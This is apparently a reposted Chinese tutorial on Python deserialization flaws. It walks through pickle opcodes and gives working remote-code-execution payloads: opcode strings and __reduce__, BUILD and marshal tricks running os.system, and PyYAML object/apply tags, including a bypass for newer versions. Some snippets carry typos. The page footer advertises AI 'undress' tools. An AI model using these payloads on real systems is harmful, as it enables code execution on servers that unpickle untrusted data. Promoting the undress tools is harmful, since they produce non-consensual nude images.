帶你去搞懂Python反序列化
本篇文章為大家帶來了關於python的相關知識,其中主要介紹了關於反序列化的相關問題,反序列化:pickle.loads() 將字串反序列化為物件、pickle.load() 從檔案中讀取資料反序列化,希望對大家有幫助。
推薦學習:python教學
#Python反序列化漏洞
Pickle
- #序列化:
pickle.dumps()
將物件序列化為字串、pickle.dump()
將物件序列化後的字串儲存為檔案 - 反序列化:
pickle.loads()
將字串反序列化為物件、pickle.load()
從檔案中讀取資料反序列化
使用
dumps()
與loads()
時可以使用protocol
參數指定協定版本協議有0,1,2,3,4,5號版本,不同的python 版本預設的協定版本不同。在這些版本中,0號是最可讀的,之後的版本為了優化加入了不可列印字元
協定是向下相容的,0號版本也可以直接使用
#可序列化的物件
-
None
、True
和False
- 整數、浮點數、複數
- str、byte、bytearray
- 只包含可封存物件的集合,包括tuple、list、set 和dict ##在模組最外層的函數(使用def 定義,lambda 函數則不行)
- 定義在模組最外層的內建函數
- 定義在模組最外層的類別
- __dict__
屬性值或
__getstate__()函數的回傳值可以被序列化的類別(詳見官方文件的Pickling Class Instances)
#反序列化流程
pickle.load()和pickle.loads()方法的底層實作是基於_Unpickler()方法來反序列化在反序列化過程中,_Unpickler(以下稱為機器吧)維護了兩個東西:堆疊區和儲存區
pickletools
PVM指令集
完整PVM指令集可以在pickletools.py 中查看,不同協定版本所使用的指令集略有不同
0: \x80 PROTO 3 # 协议版本 2: ] EMPTY_LIST # 将空列表推入栈 3: ( MARK # 将标志推入栈 4: X BINUNICODE 'a' # unicode字符 10: X BINUNICODE 'b' 16: X BINUNICODE 'c' 22: e APPENDS (MARK at 3) # 将3号标准之后的数据推入列表 23: . STOP # 弹出栈中数据,结束 highest protocol among opcodes = 2
- GLOBAL = b'c ' # 將兩個以換行為結尾的字串推入棧,第一個是模組名,第二個是類別名,即可以呼叫全域變數
- xxx.xxx
的值
REDUCE = b'R' # 將可呼叫元組和參數元組產生的物件推進棧,即 - __reduce()
傳回的第一個值作為可執行函數,第二個值為參數,執行函數
BUILD = b'b' # 透過 - __setstate__
或更新
__dict__完成建構對象,如果物件具有
__setstate__方法,則呼叫
anyobject .__setstate__(參數);如果無
__setstate__方法,則透過
anyobject.__dict__.update(argument)更新值(
更新可能會產生變數覆蓋) STOP = b'.' # 結束
import pickleimport pickletoolsclass a_class(): def __init__(self): self.age = 24 self.status = 'student' self.list = ['a', 'b', 'c']a_class_new = a_class()a_class_pickle = pickle.dumps(a_class_new,protocol=3)print(a_class_pickle)# 优化一个已经被打包的字符串a_list_pickle = pickletools.optimize(a_class_pickle)print(a_class_pickle)# 反汇编一个已经被打包的字符串pickletools.dis(a_class_pickle)
0: \x80 PROTO 3 2: c GLOBAL '__main__ a_class' 20: ) EMPTY_TUPLE # 将空元组推入栈 21: \x81 NEWOBJ # 表示前面的栈的内容为一个类(__main__ a_class),之后为一个元组(20行推入的元组),调用cls.__new__(cls, *args)(即用元组中的参数创建一个实例,这里元组实际为空) 22: } EMPTY_DICT # 将空字典推入栈 23: ( MARK 24: X BINUNICODE 'age' 32: K BININT1 24 34: X BINUNICODE 'status' 45: X BINUNICODE 'student' 57: X BINUNICODE 'list' 66: ] EMPTY_LIST 67: ( MARK 68: X BINUNICODE 'a' 74: X BINUNICODE 'b' 80: X BINUNICODE 'c' 86: e APPENDS (MARK at 67) 87: u SETITEMS (MARK at 23) # 将将从23行开始传入的值以键值对添加到现有字典中 88: b BUILD # 更新字典完成构建 89: . STOP highest protocol among opcodes = 2
常見的函數執行
與函數執行相關的PVM 指令集有三個:R 、
i 、
o ,所以我們可以從三個方向進行建構:
R :
b'''cos system (S'whoami' tR.'''
#i :
b'''(S'whoami' ios system .'''
o :
b'''(cos system S'whoami' o.'''
__reduce()__指令執行
#__recude()__ 魔法函數會在反序列化過程結束時自動調用,並返回一個元組。其中,第一個元素是可調用對象,在創建該對象的最初版本時調用,第二個元素是可調用對象的參數,使得反序列化時可能造成RCE漏洞
觸發#例:__reduce()_
pickle 在反序列化時會的指令碼為``R
,**只要在序列化中的字串中存在R
指令**,reduce方法就會被執行,無論正常程式中是否寫明了
reduce`方法
自動import 未引入的模組,所以python 標準函式庫中的所有程式碼執行、指令執行函式都可使用,但產生payload
的python 版本最好與目標一致
class a_class(): def __reduce__(self): return os.system, ('whoami',)# __reduce__()魔法方法的返回值:# os.system, ('whoami',)# 1.满足返回一个元组,元组中至少有两个参数# 2.第一个参数是被调用函数 : os.system()# 3.第二个参数是一个元组:('whoami',),元组中被调用的参数 'whoami' 为被调用函数的参数# 4. 因此序列化时被解析执行的代码是 os.system('whoami')
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.' b'\x80\x03cnt\nsystem\nX\x06\x00\x00\x00whoami\x85R.' 0: \x80 PROTO 3 2: c GLOBAL 'nt system' 13: X BINUNICODE 'whoami' 24: \x85 TUPLE1 25: R REDUCE 26: . STOP highest protocol among opcodes = 2
将该字符串反序列化后将会执行命令 os.system('whoami')
全局变量覆盖
__reduce()_
利用的是 R 指令码,造成REC,而利用 GLOBAL = b’c’ 指令码则可以触发全局变量覆盖
# secret.pya = aaaaaa
# unser.pyimport secretimport pickleclass flag(): def __init__(self, a): self.a = a your_payload = b'?'other_flag = pickle.loads(your_payload)secret_flag = flag(secret)if other_flag.a == secret_flag.a: print('flag:{}'.format(secret_flag.a))else: print('No!')
在不知道 secret.a 的情况下要如何获得 flag 呢?
先尝试获得 flag() 的序列化字符串:
class flag(): def __init__(self, a): self.a = a new_flag = pickle.dumps(Flag("A"), protocol=3)flag = pickletools.optimize(new_flag)print(flag)print(pickletools.dis(new_flag))
b'\x80\x03c__main__\nFlag\n)\x81}X\x01\x00\x00\x00aX\x01\x00\x00\x00Asb.' 0: \x80 PROTO 3 2: c GLOBAL '__main__ Flag' 17: q BINPUT 0 19: ) EMPTY_TUPLE 20: \x81 NEWOBJ 21: q BINPUT 1 23: } EMPTY_DICT 24: q BINPUT 2 26: X BINUNICODE 'a' 32: q BINPUT 3 34: X BINUNICODE 'A' 40: q BINPUT 4 42: s SETITEM 43: b BUILD 44: . STOP highest protocol among opcodes = 2
可以看到,在34行进行了传参,将变量 A 传入赋值给了a。若将 A 修改为全局变量 secret.a,即将 X BINUNICODE 'A'
改为 c GLOBAL 'secret a'
(X\x01\x00\x00\x00A
改为 csecret\na\n
)。将该字符串反序列化后,self.a 的值等于 secret.a 的值,成功获取 flag
除了改写 PVM 指令的方式外,还可以使用 exec 函数造成变量覆盖:
test1 = 'test1'test2 = 'test2'class A: def __reduce(self): retutn exec, "test1='asd'\ntest2='qwe'"登入後複製
利用BUILD指令RCE(不使用R指令)
通过BUILD指令与GLOBAL指令的结合,可以把现有类改写为os.system
或其他函数
假设某个类原先没有__setstate__
方法,我们可以利用{'__setstate__': os.system}
来BUILE这个对象
BUILD指令执行时,因为没有__setstate__
方法,所以就执行update,这个对象的__setstate__
方法就改为了我们指定的os.system
接下来利用'whoami'
来再次BUILD这个对象,则会执行setstate('whoami')
,而此时__setstate__
已经被我们设置为os.system
,因此实现了RCE
例:
代码中存在一个任意类:
class payload: def __init__(self): pass
根据这个类构造 PVM 指令:
0: \x80 PROTO 3 2: c GLOBAL '__main__ payload' 17: q BINPUT 0 19: ) EMPTY_TUPLE 20: \x81 NEWOBJ 21: } EMPTY_DICT # 使用BUILD,先放入一个字典 22: ( MARK # 放值前先放一个标志 23: V UNICODE '__setstate__' # 放键值对 37: c GLOBAL 'nt system' 48: u SETITEMS (MARK at 22) 49: b BUILD # 第一次BUILD 50: V UNICODE 'whoami' # 加参数 58: b BUILD # 第二次BUILD 59: . STOP
将上述 PVM 指令改写成 bytes 形式:b'\x80\x03c__main__\npayload\n)\x81}(V__setstate__\ncnt\nsystem\nubVwhoami\nb.'
,使用 piclke.loads()
反序列化后成功执行命令
利用Marshal
模块造成任意函数执行
pickle 不能将代码对象序列化,但 python 提供了一个可以序列化代码对象的模块 Marshal
但是序列化的代码对象不再能使用 __reduce()_
调用,因为__reduce__
是利用调用某个可调用对象并传递参数来执行的,而我们这个函数本身就是一个可调用对象 ,我们需要执行它,而不是将他作为某个函数的参数。隐藏需要利用 typres
模块来动态的创建匿名函数
import marshalimport typesdef code(): import os print('hello') os.system('whoami')code_pickle = base64.b64encode(marshal.dumps(code.__code__)) # python2为 code.func_codetypes.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')() # 利用types动态创建匿名函数并执行
在 pickle
上使用:
import pickle# 将types.FunctionType(marshal.loads(base64.b64decode(code_pickle)), globals(), '')()改写为 PVM 的形式s = b"""ctypes FunctionType (cmarshal loads (cbase64 b64decode (S'4wAAAAAAAAAAAAAAAAEAAAADAAAAQwAAAHMeAAAAZAFkAGwAfQB0AWQCgwEBAHwAoAJkA6EBAQBkAFMAKQRO6QAAAADaBWhlbGxv2gZ3aG9hbWkpA9oCb3PaBXByaW502gZzeXN0ZW0pAXIEAAAAqQByBwAAAPogRDovUHl0aG9uL1Byb2plY3QvdW5zZXJpYWxpemUucHnaBGNvZGUlAAAAcwYAAAAAAQgBCAE=' tRtRc__builtin__ globals (tRS'' tR(tR."""pickle.loads(s) # 字符串转换为 bytes
漏洞出现位置
- 解析认证 token、session 时
- 将对象 pickle 后存储在磁盘文件
- 将对象 pickle 后在网络中传输
- 参数传递给程序
PyYAML
yaml
是一种标记类语言,类似与 xml
和 json
,各个支持yaml格式的语言都会有自己的实现来进行 yaml
格式的解析(读取和保存),PyYAML
就是 yaml
的 python 实现
在使用 PyYAML
库时,若使用了 yaml.load()
而不是 yaml.safe_load()
函数解析 yaml
文件,则会导致反序列化漏洞的产生
原理
PyYAML
有针对 python 语言特有的标签解析的处理函数对应列表,其中有三个和对象相关:
!!python/object: => Constructor.construct_python_object!!python/object/apply: => Constructor.construct_python_object_apply!!python/object/new: => Constructor.construct_python_object_new
例如:
# Test.pyimport yamlimport osclass test: def __init__(self): os.system('whoami')payload = yaml.dump(test())fp = open('sample.yml', 'w')fp.write(payload)fp.close()
该代码执行后,会生成 sample.yml
,并写入 !!python/object:__main__.test {}
将文件内容改为 !!python/object:Test.test {}
再使用 yaml.load()
解析该 yaml
文件:
import yaml yaml.load(file('sample.yml', 'w'))
命令成功执行。但是命令的执行依赖于 Test.py
的存在,因为 yaml.load()
时会根据yml文件中的指引去读取 Test.py
中的 test
这个对象(类)。如果删除 Test.py
,也将运行失败
Payload
PyYAML
想要消除依赖执行命令,就需要将其中的类或者函数换成 python 标准库中的类或函数,并使用另外两种 python 标签:
# 该标签可以在 PyYAML 解析再入 YAML 数据时,动态的创建 Python 对象!!python/object/apply: => Constructor.construct_python_object_apply# 该标签会调用 apply!!python/object/new: => Constructor.construct_python_object_new
利用这两个标签,就可以构造任意 payload:
!!python/object/apply:subprocess.check_output [[calc.exe]]!!python/object/apply:subprocess.check_output ["calc.exe"]!!python/object/apply:subprocess.check_output [["calc.exe"]]!!python/object/apply:os.system ["calc.exe"]!!python/object/new:subprocess.check_output [["calc.exe"]]!!python/object/new:os.system ["calc.exe"]
PyYAML
>= 5.1
在版本 PyYAML
>= 5.1 后,限制了反序列化内置类方法以及导入并使用不存在的反序列化代码,并且在使用 load()
方法时,需要加上 loader
参数,直接使用时会爆出安全警告
loader的四种类型:
- BaseLoader:仅加载最基本的YAML
- SafeLoader:安全地加载YAML语言的子集,建议用于加载不受信任的输入(safe_load)
- FullLoader:加载完整的YAML语言,避免任意代码执行,这是当前(PyYAML 5.1)默认加载器调用yaml.load(input) (出警告后)(full_load)
- UnsafeLoader(也称为Loader向后兼容性):原始的Loader代码,可以通过不受信任的数据输入轻松利用(unsafe_load)
在高版本中之前的 payload 已经失效,但可以使用 subporcess.getoutput()
方法绕过检测:
!!python/object/apply:subprocess.getoutput - whoami
在最新版本上,命令执行成功
ruamel.yaml
ruamel.yaml的用法和PyYAML基本一样,并且默认支持更新的YAML1.2版本
在ruamel.yaml中反序列化带参数的序列化类方法,有以下方法:
- load(data)
- load(data, Loader=Loader)
- load(data, Loader=UnsafeLoader)
- load(data, Loader=FullLoader)
- load_all(data)
- load_all(data, Loader=Loader)
- load_all(data, Loader=UnSafeLoader)
- load_all(data, Loader=FullLoader)
我们可以使用上述任何方法,甚至我们也可以通过提供数据来反序列化来直接调用load(),它将完美地反序列化它,并且我们的类方法将被执行
推荐学习:python学习教程
以上是帶你去搞懂Python反序列化的詳細內容。更多資訊請關注PHP中文網其他相關文章!

熱AI工具

Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool
免費脫衣圖片

Clothoff.io
AI脫衣器

AI Hentai Generator
免費產生 AI 無盡。

熱門文章

熱工具

記事本++7.3.1
好用且免費的程式碼編輯器

SublimeText3漢化版
中文版,非常好用

禪工作室 13.0.1
強大的PHP整合開發環境

Dreamweaver CS6
視覺化網頁開發工具

SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)

熱門話題

PHP和Python各有優劣,選擇取決於項目需求和個人偏好。 1.PHP適合快速開發和維護大型Web應用。 2.Python在數據科學和機器學習領域佔據主導地位。

在CentOS系統上高效訓練PyTorch模型,需要分步驟進行,本文將提供詳細指南。一、環境準備:Python及依賴項安裝:CentOS系統通常預裝Python,但版本可能較舊。建議使用yum或dnf安裝Python3併升級pip:sudoyumupdatepython3(或sudodnfupdatepython3),pip3install--upgradepip。 CUDA與cuDNN(GPU加速):如果使用NVIDIAGPU,需安裝CUDATool

在CentOS系統上啟用PyTorchGPU加速,需要安裝CUDA、cuDNN以及PyTorch的GPU版本。以下步驟將引導您完成這一過程:CUDA和cuDNN安裝確定CUDA版本兼容性:使用nvidia-smi命令查看您的NVIDIA顯卡支持的CUDA版本。例如,您的MX450顯卡可能支持CUDA11.1或更高版本。下載並安裝CUDAToolkit:訪問NVIDIACUDAToolkit官網,根據您顯卡支持的最高CUDA版本下載並安裝相應的版本。安裝cuDNN庫:前

Docker利用Linux內核特性,提供高效、隔離的應用運行環境。其工作原理如下:1. 鏡像作為只讀模板,包含運行應用所需的一切;2. 聯合文件系統(UnionFS)層疊多個文件系統,只存儲差異部分,節省空間並加快速度;3. 守護進程管理鏡像和容器,客戶端用於交互;4. Namespaces和cgroups實現容器隔離和資源限制;5. 多種網絡模式支持容器互聯。理解這些核心概念,才能更好地利用Docker。

Python和JavaScript在社區、庫和資源方面的對比各有優劣。 1)Python社區友好,適合初學者,但前端開發資源不如JavaScript豐富。 2)Python在數據科學和機器學習庫方面強大,JavaScript則在前端開發庫和框架上更勝一籌。 3)兩者的學習資源都豐富,但Python適合從官方文檔開始,JavaScript則以MDNWebDocs為佳。選擇應基於項目需求和個人興趣。

在CentOS下選擇PyTorch版本時,需要考慮以下幾個關鍵因素:1.CUDA版本兼容性GPU支持:如果你有NVIDIAGPU並且希望利用GPU加速,需要選擇支持相應CUDA版本的PyTorch。可以通過運行nvidia-smi命令查看你的顯卡支持的CUDA版本。 CPU版本:如果沒有GPU或不想使用GPU,可以選擇CPU版本的PyTorch。 2.Python版本PyTorch

MinIO對象存儲:CentOS系統下的高性能部署MinIO是一款基於Go語言開發的高性能、分佈式對象存儲系統,與AmazonS3兼容。它支持多種客戶端語言,包括Java、Python、JavaScript和Go。本文將簡要介紹MinIO在CentOS系統上的安裝和兼容性。 CentOS版本兼容性MinIO已在多個CentOS版本上得到驗證,包括但不限於:CentOS7.9:提供完整的安裝指南,涵蓋集群配置、環境準備、配置文件設置、磁盤分區以及MinI

CentOS 安裝 Nginx 需要遵循以下步驟:安裝依賴包,如開發工具、pcre-devel 和 openssl-devel。下載 Nginx 源碼包,解壓後編譯安裝,並指定安裝路徑為 /usr/local/nginx。創建 Nginx 用戶和用戶組,並設置權限。修改配置文件 nginx.conf,配置監聽端口和域名/IP 地址。啟動 Nginx 服務。需要注意常見的錯誤,如依賴問題、端口衝突和配置文件錯誤。性能優化需要根據具體情況調整,如開啟緩存和調整 worker 進程數量。
